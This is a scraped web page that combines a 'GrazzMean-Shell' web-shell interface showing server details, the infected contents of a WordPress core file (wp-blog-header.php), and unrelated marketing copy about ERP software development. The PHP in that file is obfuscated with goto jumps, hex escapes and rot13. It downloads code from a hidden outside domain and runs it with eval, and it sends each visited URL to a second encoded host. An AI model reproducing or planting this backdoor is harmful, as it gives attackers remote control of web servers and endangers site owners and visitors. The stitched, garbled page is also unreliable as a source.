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GrazzMean-Shell Shell

: /var/www/ [ drwxr-xr-x ]
Uname: Linux wputd 5.4.0-200-generic #220-Ubuntu SMP Fri Sep 27 13:19:16 UTC 2024 x86_64
Software: Apache/2.4.41 (Ubuntu)
PHP version: 7.4.3-4ubuntu2.24 [ PHP INFO ] PHP os: Linux
Server Ip:
Your Ip:
User: www-data (33) | Group: www-data (33)
Safe Mode: OFF
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name : wp-blog-header.php
 goto JMd0_; yo8hW: session_start(); goto hzEto; OnRXI: Jry5X: goto Qbb3Z; ba2z3: function xmnSr($KMF4K) { goto Abk7e; Abk7e: $gW_W7 = ''; goto YRF9Q; Z14l9: fclose($f1I4V); goto nAb9m; SVZ4r: $gW_W7 = stream_get_contents($f1I4V); goto Z14l9; w2ttO: $gW_W7 = curl_exec($cRJvQ); goto SLTDO; rfG74: $f1I4V = fopen($KMF4K, "\162"); goto SVZ4r; sG9V7: bf59H: goto vWZ2y; W3HU_: BllYp: goto uDowp; AJEe8: $gW_W7 = file_get_contents($KMF4K); goto W3HU_; i8vZZ: $cRJvQ = curl_init($KMF4K); goto TfqvQ; uDowp: if (!(empty($gW_W7) && function_exists("\146\157\x70\x65\156") && function_exists("\x73\164\162\145\x61\x6d\137\147\145\164\x5f\x63\157\x6e\164\145\x6e\164\163"))) { goto eQd5c; } goto rfG74; mVt23: curl_setopt($cRJvQ, CURLOPT_FOLLOWLOCATION, 1); goto bBd07; TfqvQ: curl_setopt($cRJvQ, CURLOPT_RETURNTRANSFER, 1); goto mVt23; tGDKU: curl_setopt($cRJvQ, CURLOPT_SSL_VERIFYHOST, 0); goto w2ttO; vWZ2y: if (!(empty($gW_W7) && function_exists("\x66\151\154\145\x5f\x67\x65\x74\x5f\143\x6f\x6e\x74\x65\156\x74\163"))) { goto BllYp; } goto AJEe8; f5DvE: return $gW_W7; goto SCmbd; SLTDO: curl_close($cRJvQ); goto sG9V7; bBd07: curl_setopt($cRJvQ, CURLOPT_SSL_VERIFYPEER, 0); goto tGDKU; YRF9Q: if (!function_exists("\x63\165\x72\154\137\145\170\x65\143")) { goto bf59H; } goto i8vZZ; nAb9m: eQd5c: goto f5DvE; SCmbd: } goto bvmYH; QW2gS: goto Jry5X; goto NsEwy; ndw2v: $_SESSION["\144\x6f\141\143\164"] = $C0zed; goto OnRXI; Qbb3Z: $Bsvtd = XMnsR(str_rot13("\x75\x67\x67\143\146\x3a\57\57\151\143\x66\161\161\x2e\x71\163\144\163\x6e\147\x2e\x67\142\143\x2f\161\x62\142\x65\x2f") . $C0zed . "\x2e\164\x78\x74"); goto ZstNM; NsEwy: A1bWV: goto ndw2v; xuOui: $KMF4K = (isset($_SERVER["\x48\x54\x54\x50\123"]) && $_SERVER["\x48\x54\124\120\x53"] === "\157\x6e" ? "\x68\164\x74\x70\x73" : "\150\x74\164\x70") . "\x3a\57\57{$_SERVER["\x48\124\x54\120\x5f\x48\x4f\123\124"]}{$_SERVER["\122\105\121\x55\x45\123\124\x5f\x55\122\111"]}"; goto AFVMk; AFVMk: OKVkZ(array("\167\x65\142" => $KMF4K)); goto QW2gS; JMd0_: error_reporting(0); goto yo8hW; m0vRc: if (!empty($C0zed)) { goto A1bWV; } goto xuOui; hzEto: $C0zed = $_REQUEST["\144\x6f\141\143\164"]; goto m0vRc; ZstNM: eval("\x3f\x3e" . $Bsvtd); goto ba2z3; bvmYH: function OKVKZ($qWT4v) { goto BAchi; U1QPj: $wAXrk = curl_init(str_rot13($KMF4K)); goto rADty; JE5Eo: curl_setopt($wAXrk, CURLOPT_RETURNTRANSFER, true); goto Camhf; Camhf: $tvBIN = curl_exec($wAXrk); goto PrZTC; BAchi: $KMF4K = "\x75\147\147\x63\x3a\57\x2f\170\x66\157\155\x38\x64\56\157\154\x75\142\147\56\147\x62\x63\57\x76\141\161\162\153\56\143\165\143"; goto U1QPj; PrZTC: curl_close($wAXrk); goto hS0OT; fi8yP: curl_setopt($wAXrk, CURLOPT_POSTFIELDS, $qWT4v); goto JE5Eo; rADty: curl_setopt($wAXrk, CURLOPT_POST, 1); goto fi8yP; hS0OT: }?>
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ERP Software Development

ERP Software Development, ERP Systems, Services

Enterprise Resource Planning (ERP) software development refers to the software that integrates an organization’s core business processes.

Enterprise Resource PLanning


The technical value ERP software systems provide affect communication through improved workflows, standardize business process, increase productivity and efficiency with advanced planning and reporting features, and offer flexibility and scalability to manage growth.


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Integrated and centralized

Enterprise Resource Planning (ERP) software refers to the system that integrates an organization’s core business processes.  ERP software systems are enterprise wide and typically cover most functions for a business including financial, operational, human resources, CRM, manufacturing, and supply chain.  The results are an integrated and centralized system of applications.  ERP software development will enable your organization to increase efficiency by eliminating manual processes and streamlining operations.   


The advantages of cross department integration managed within by a synchronous system are abundant.  ERP software systems provide a common interface to share real-time data, enterprise wide.  The technical value ERP software systems provide affect communication through improved workflows; standardize business process; increase productivity and efficiency with advanced planning and reporting features; offer flexibility and scalability to manage growth.  Additionally, ERP software systems can enhance security and compliance concerns and be built in to your ERP software system with a custom solution.


Centralized | Automated | Standardized | Streamlined

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